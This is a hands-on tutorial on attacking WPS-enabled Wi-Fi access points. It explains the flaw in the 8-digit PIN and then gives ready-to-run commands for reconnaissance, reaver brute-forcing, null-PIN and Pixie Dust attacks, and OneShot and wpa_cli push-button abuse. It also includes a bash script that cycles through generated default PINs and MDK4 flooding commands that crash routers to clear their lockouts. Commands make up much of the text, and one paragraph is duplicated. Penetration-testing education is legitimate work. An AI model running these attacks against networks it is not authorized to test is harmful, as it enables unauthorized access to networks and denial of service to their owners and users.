WPS Hacking

WPS was originally developed by Cisco in 2006 as a method to enable convenience and ease of use for users with little knowledge. Either through the push of a button or entering of a PIN users are able to easily connect their devices to their wireless network. Since then, multiple different exploitation tools have been developed with the intent to abuse the PIN. WPS PINs are eight digits in length, making them significantly easier to crack compared to traditional WPA methods.

WPS Connection Methods

There are four methods to connect to a WPS-enabled access point. Each of them is detailed below:

Security Concerns

PIN Method Vulnerability: The 8-digit PIN can be cracked relatively easily through brute-force attacks due to the way the protocol verifies the PIN in two halves.

Physical Security Risks: The PBC method relies on physical security, meaning an unauthorized person within range could potentially push the button and connect to the network.

WPS PIN Anatomy

The WPS PIN is eight digits in length and consists of two primary portions. The first portion is used in the M4 and M5 EAP messages, and the second portion is used in the M6 and M7 EAP messages. Each of these portions is four digits in length. Most would assume that there would be 100,000,000 (10^8) possible digit combinations, but in the case of WPS, this is not true. There are only 11,000 possible combinations.

This is due to how the PIN functions. The first half only has 104 possible combinations and the second half has only 103 possible combinations. The last digit of the second half is used as a checksum and can be easily calculated. Therefore, there are only 10,000 (104) + 1,000(103) possible digit combinations, which is 11,000 total combinations.

Cracking Methods

1. Online brute-forcing

2. Offline brute-forcing, also known as the Pixie Dust Attack

WPS Reconnaissance

In order to analyze a target network, we need to view its WPS information. We can do so with several different tools. Some of the information we hope to attain is the MAC address of the access point and which WPS version it is using. The MAC address is useful because an easy vendor lookup may allow us to find that the access point's vendor may or may not be susceptible to different kinds of WPS attacks. This can easily be done with a bit of research, and later we will explore custom PIN generation based on this information. Additionally, we want to find which version of WPS is running, along with which mode it is in, as it will help us narrow down which attack techniques to employ.

If an access point is running WPS version 2.0 it is unlikely that we will be able to use any vector beyond pixie dust attacks, possibly null pin attacks, and brute forcing attempts with very long reattempt periods. This is due to a few factors, such as a locking feature built into most access points. After a certain amount of incorrectly guessed PINs the access point locks and requires either a reboot or timeout for additional PIN guesses.

Putting Card in Monitor Mode and scanning WPS Networks

airmon-ng start wlan0

For reaver to work, use the following command to put in monitor moder.

iw dev wlan0 interface add mon0 type monitor

Then we can start monitoring WPS networks

airodump-ng --wps --ignore-negative-one wlan0mon

We could also narrow down our scan further to just our network in question with the following command. We specify the channel with -c and the AP MAC with --bssid

airodump-ng --wps --ignore-negative-one -c 1 --bssid D8:D7:3D:EB:29:D5 wlan0mon

Wash is another great tool for scanning networks with WPS. We can employ a simple command with wash to display all networks with WPS and their respective versions

wash -i wlan0mon

We can display much more verbose output with wash using the following command.

wash -j -i wlan0mon

Finding Vendor

we can find out which vendor is associated with the access point with the following command, specifying the beginning of the MAC address.

grep -i "84-1B-5E" /var/lib/ieee-data/oui.txt

Things to be wary of when testing WPS

1. The WPS version. wps_locked status: We want to ensure that clients can join the network.

2. The WPS Mode: If we need to press a button to join the network, chances are we are not cracking the PIN this way.

3. Max PIN Attempts Locking: If the access point locks after a few incorrectly guessed PINs, we likely will not be able to get through all 11,000 possible combinations.

Online PIN Brute-Forcing

Reaver

Reaver is an excellent tool for conducting online password cracking attempts. It offers various options, including Null PIN attacks, custom PIN associations, Pixie Dust Attacks, and general brute-forcing.

iw dev wlan0 interface add mon0 type monitor

reaver -i [interface] -b [BSSID] -c [channel]

reaver -i mon0 -b 22:DD:48:FA:35:E9 -c 1 

Bruteforcing Half Known Pins

If we know the first four digits of the WPS PIN, we can use Reaver to bruteforce the remaining four digits. We can provide the known half PIN using the -p option followed by the first four digits. For example, if the known first half of the PIN is 1234, we would use -p 1234.

reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 8487

Testing for Null PIN

Suppose neither of these succeed, we could also attempt a Null PIN attack. Some access points are vulnerable to Null PIN attacks and will even disclose the WPA-PSK when no PIN is sent. We can do so by employing the following command, specifying the Null PIN with -p "" or -p " ".

reaver -b 7E:A3:5A:22:C5:90 -c 1 -i mon0 -p " "

Retrieving WPA-PSK using Reaver with a Known PIN

If one of our brute forcing attempts succeeds, we can use the following command to verify the captured PIN. Alternatively, if the access point has a label with the PIN physically printed on the backside of the router, we can use this information to retrieve the WPA-PSK for the WiFi network. This method leverages the default PIN provided by the manufacturer to potentially gain access to the network. For the technique of using the PIN printed on the label to retrieve the WPA-PSK, the access point (AP) must be in label mode.

reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 84870575

Secured Access Points

Traditionally, online brute-forcing attempts have been utilized in retrieving the WPS PIN and WPA-PSK. However, in recent years, manufacturers have become wiser to these attacks. As such, locking has been utilized to prevent these traditional bruteforcing techniques. The most recent vendors only allow up to 3 incorrect attempts. After each incorrect attempt, the AP will lock for 60 seconds. After 10 incorrect attempts, the AP will lock for 365 days.

Using Multiple Pre-defined PINs

While it is possible to bruteforce the WPS PIN using Reaver, we can also use a custom wordlist of potential PINs. In this section, we will explore how to generate possible PINs for a WiFi network using wpspin and then create a custom bash script to bruteforce the access point with these PINs.

The WPSPin tool is a powerful tool that includes many different PIN generation algorithms. This tool allows us to once again provide the BSSID of our target network and receive a list of possible default PINs.

git clone https://github.com/drygdryg/wpspin.git

sudo python setup.py install

wpspin -A 60:38:E0:A2:3D:2A

WPSPin outputs a variety of possible PINs for valid BSSIDs. To retrieve the WPA-PSK from a known PIN, we can use the following command.

sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p 73834410

In the above command, -l sets the time to wait if the access point locks WPS PIN attempts, which is set to 100 seconds. The -r option specifies the recurring delay, meaning the command will sleep for 45 seconds every 3 attempts. The --max-attempts=1 specifies that the tool will only attempt the PIN one time. This option ensures that the PIN is tested just once, rather than multiple attempts.

We can extract only the pins from the wpspin output using a combination of grep and tr commands:

wpspin -A 60:38:E0:A2:3D:2A | grep -Eo '\b[0-9]{8}\b' | tr '\n' ' '

We can now store this output in a variable of a bash script and use it for brute-forcing WPS

#!/bin/bash

# Define the list of generated PINs
PINS='76142673 24952910 31080279 31080279 10149713 42705239 65814352 35934868 20660413 53157652 84636386 91629487 52285349 28428015 51018658 66505471 04217176 12345670 20172527 46264848 76229909 62327145 10864111 31957199 30432031 71412252 68175542 95661469 95719115 48563710 20854836 43977680 05294176 99956042 35611530 67958146 34259283 94229882 95755212'

# Loop through each PIN in the list
for PIN in $PINS; do
    echo "Attempting PIN: $PIN"
    
    # Execute reaver command with the given PIN
    sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 72:40:6E:74:2F:3B -v -c 1 -p "$PIN"
    
    # Check if the command executed successfully
    if [ $? -ne 0 ]; then
        echo "An error occurred while attempting PIN: $PIN"
    fi
done

echo "PIN guesses complete."

For each generated PIN attempted, the script will try the PIN only once, and then wait for 100 seconds if the access point (AP) locks Additionally, for every three attempts made, it will pause for 45 seconds. The script iterates through all the PINs in the list, which can be seen in action in the example below:

Using PIN Generation Tools

When crafting an online brute-forcing attempt, it can be cumbersome to guess all 11,000 possible PINs especially considering most access points are utilizing default PINs. Luckily, over the years many different libraries and tools have been developed to generate these default PINs. Some of these include the Arcadyan, Vodafone EasyBox, and ComputePIN default generation algorithms

Pixie Dust Attack

Some vendors such as Ralink, Realtek, MediaTek, and Broadcom are susceptible to offline bruteforcing techniques through the Pixie Dust Attack. This is due to bad randomization during nonce generation. The E-S1 and E-S2 nonce values are 128-bits. As such, if we were to try to blindly bruteforce the hash values through variable brute force, this would take a very long time. Due to certain vendors having bad/predictable nonce value generation, we can retrieve these values, which makes bruteforcing on the E-Hash1 and E-Hash2 values much quicker. This helps eliminate the need to conduct online bruteforcing through every iteration of a possible PIN.

Reaver

We can use Reaver to perform a Pixie Dust attack against it, specifying the -K (or --pixie-dust) option.

reaver -K 1 -vvv -b 7E:E7:15:97:2D:6F -c 1 -i mon0

We can subsequently use this PIN to obtain the PSK (Pre-Shared Key) for the WiFi network.

reaver -b 7E:E7:15:97:2D:6F -c 1 -p 32452370 -i mon0

Oneshot

We need to put our interface in monitor mode with airodump

To perform a Pixie Dust attack using OneShot, we again require our interface to be in monitor mode. However, before proceeding, we should delete the previously configured mon0 interface.

iw dev mon0 del

airmon-ng start wlan0

Similar to Reaver, OneShot also includes the -K (or --pixie-dust) argument. Let's apply this option and initiate the attack.

sudo python3 /opt/OneShot/oneshot.py -i wlan0mon -b 7E:E7:15:97:2D:6F -K

Push Button Configuration

Push Button Configuration (PBC) is a simple and user-friendly method for connecting devices to a wireless network using Wi-Fi Protected Setup (WPS). It’s particularly useful for users who want to avoid entering complex passwords. PBC is a feature of WPS that allows users to connect devices to a Wi-Fi network by simply pressing a physical button on the router/AP and the connecting device, instead of entering a password.

How Does PBC Work? Physical Button Press: Most routers and access points have a WPS button that triggers PBC. Automatic Pairing: After pressing the button, the router will listen for new device requests to connect for a set time (usually two minutes). During this period, any device that requests access can connect without needing a password. Device Side Interaction: The connecting device (e.g., smartphone, smart TV, etc.) typically has an option to connect via WPS. After selecting this, the device searches for routers or access points in PBC mode and establishes a connection. The connection is established without the need to enter a password manually.

We can use airodump-ng to check if the Wi-Fi network is in Push Button Configuration (PBC) mode

airodump-ng wlan0mon -c 1 --wps

Consider a scenario where we are performing a wireless penetration test and discover an access point with WPS enabled. Since we're onsite at the client's office, we have direct access to the router. In this situation, we can physically press the WPS button on the back of the router, allowing us to connect to the access point without having to manually enter a password. We can achieve this by using tools such as oneshot for automated execution, or manually by utilizing wpa_cli to establish the connection.

We can also use Oneshot to automate the exploitation of PBC. Oneshot will automatically generate the valid WPS PIN and WPA passphrase for the access point. To use Oneshot, we first need to enable monitor mode on the wlan0 interface by using airmon-ng. Once monitor mode is enabled, we can run Oneshot with the --pbc argument to connect using PBC mode.

python3 /opt/OneShot/oneshot.py -i wlan0mon --pbc

wps_cli

First, we need to scan for available access points to obtain their BSSID. This can be done using the iwlist scan command, as demonstrated below.

iwlist wlan0 scan |  grep 'Cell\|Quality\|ESSID\|IEEE'

Alternatively, we can achieve the same result with wpa_cli.

wpa_cli scan_results

Once we have identified our target BSSID, we immediately press the WPS button on the back of the router and execute following command.

wpa_cli wps_pbc D8:D6:3D:EB:29:D5

After a few seconds, we can check wpa_supplicant to verify that we've successfully connected to the Wi-Fi network.

systemctl status wpa_supplicant

We can use dhclient followed by the interface name, such as wlan0, to obtain a valid IP address within the access point's subnet.

sudo dhclient wlan0

Crashing a Target AP with MDK4

During our efforts of retrieving the PIN and WPA-PSK, we are likely to encounter an access point locking at some point. In this section, we will demonstrate how flooding and crashing the AP can be used as a potential bypass. There are a few different kinds of WPS locks, one of which is a delay period that occurs after too many incorrect guesses. As we demonstrated in an earlier section, we can bypass this using our advanced command, specifying the sleep period and time between attempts:

sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11

The second kind of WPS lock is one that requires the AP to be reset, either through a power cycle or some other means, after too many incorrect PIN attempts. This can dissuade us as attackers from continuing WPS PIN retrieval techniques. However, Authentication Denial-of-Service and EAPOL Start and Logoff packet injection flooding attacks can grant us this access point reset. In some cases, this will remove the WPS lock. It is worth noting that not all access points are vulnerable to these two aggressive techniques, and these techniques are truly a last resort. In some instances, the access point will crash, while the WPS lock remains enabled.

During our efforts of retrieving the PIN and WPA-PSK, we are likely to encounter an access point locking at some point. In this section, we will demonstrate how flooding and crashing the AP can be used as a potential bypass. There are a few different kinds of WPS locks, one of which is a delay period that occurs after too many incorrect guesses. As we demonstrated in an earlier section, we can bypass this using our advanced command, specifying the sleep period and time between attempts.

Suppose our access point displays a locked status. This will halt all PIN attempts occurring in the first terminal. Luckily, MDK4 includes functionality in its attack modules for both Authentication Denial-of-Service and EAPOL Start and Logoff Packet Injection flooding. In our third terminal, we can employ the following command to test for Authentication Denial-of-Service flooding. We specify attack module a for Authentication Denial-of-Service, and our access point's MAC address with -a.

sudo mdk4 wlan0mon a -a 60:38:E0:XX:XX:XX

Crashing a target access point (AP) with MDK4 is a method that only works on very old routers. Recent routers are not vulnerable to this type of Denial-of-Service (DoS) attack.

Authentication Denial-Of-Service attacks will continue to spoof MAC addresses to authenticate to the network. This floods the access point's client list, and in many cases causes the access point to crash, thus resetting it. This can enable us to redeem an unlocked WPS status. Alternatively, we could attempt this same attack with the Intelligent Test on the access point. The Intelligent Test connects clients against the AP and reinjects sniffed data to keep them alive.

sudo mdk4 wlan0mon a -i 60:38:E0:XX:XX:XX

If our access point is still displaying a locked status in our second terminal, we could then attempt an EAPOL Start and Logoff Packet Injection attack. In the third terminal, we have our choice of EAPOL Start or EAPOL Logoff messages. To use EAPOL Start messages, we run the following command.

mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX

To use EAPOL Logoff messages to kick clients off the network, we can employ the command seen below

mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX -l

Alternatively, we could leave our EAPOL Start message MDK4 command running in our third terminal and begin the EAPOL Logoff messages in a fourth terminal. We can also utilize a deauthentication attack to kick clients.